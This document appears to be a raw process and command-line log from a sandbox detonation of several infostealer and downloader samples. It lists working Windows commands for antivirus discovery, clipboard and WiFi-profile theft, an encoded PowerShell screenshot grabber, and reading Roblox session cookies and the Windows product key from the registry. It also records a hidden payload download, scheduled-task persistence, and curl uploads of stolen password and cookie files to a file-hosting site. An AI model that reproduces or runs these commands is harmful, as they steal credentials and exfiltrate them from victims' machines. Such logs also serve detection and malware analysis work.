C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAH
QAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xfbs1blz\xfbs1blz.cmdline"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABD2.tmp" "c:\Users\Admin\AppData\Local\Temp\xfbs1blz\CSC6F1275C1466A4B1FB51355725463AB7.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\Hg7K3.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI65362\rar.exe a -r -hp"Logger1@12345" "C:\Users\Admin\AppData\Local\Temp\Hg7K3.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/ucm1/releases/download/iu1/shost.exe/' -outfile shost.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfb63cc40,0x7ffdfb63cc4c,0x7ffdfb63cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1740,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1720 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=2096,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=2156,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2184 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3048,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3064 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3128,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3300 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3492,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4384 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4660 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=4288,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3288 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=3024,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4724 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\BWCStartMSI.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=3576,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3580 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /q /i BWCInstaller.msi /norestart

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\downloader.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VipToolMeta.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VipToolMeta.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3064,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2260 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4700,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4924 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4944,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:1

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 7288FB02CAA8AFED10124D7D86A0F655

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5024,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5152 /prefetch:1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSIF7A1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240842921 2 CustomActions!CustomActions.CustomActions.StartApp

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\new.exe"

C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe

"C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe"

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Windows\Installer\MSIFB6B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240843640 8 CustomActions!CustomActions.CustomActions.InstallPing

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=2272,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4308 /prefetch:1

C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe

"C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows Startup\Sever Startup.exe" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "new" /tr "C:\Users\Admin\AppData\Roaming\new.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3500,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2236 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3496,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4404 /prefetch:1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Lu4421.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\archive.htm

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffdfae03cb8,0x7ffdfae03cc8,0x7ffdfae03cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,1326786680789188261,2176719665760713593,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=4232,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5192 /prefetch:8

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TrackYourSentOLSetup.exe"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 820720ED358ACB2F23030A0E73AE6B55 C

C:\Users\Admin\AppData\Local\Temp\shost.exe

shost.exe

C:\Users\Admin\AppData\Local\Temp\shost.exe

shost.exe

C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe

"C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"

C:\Windows\system32\taskkill.exe

taskkill /im firefox.exe /t /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile

C:\Users\Admin\AppData\Local\Temp\812297\Shopzilla.pif

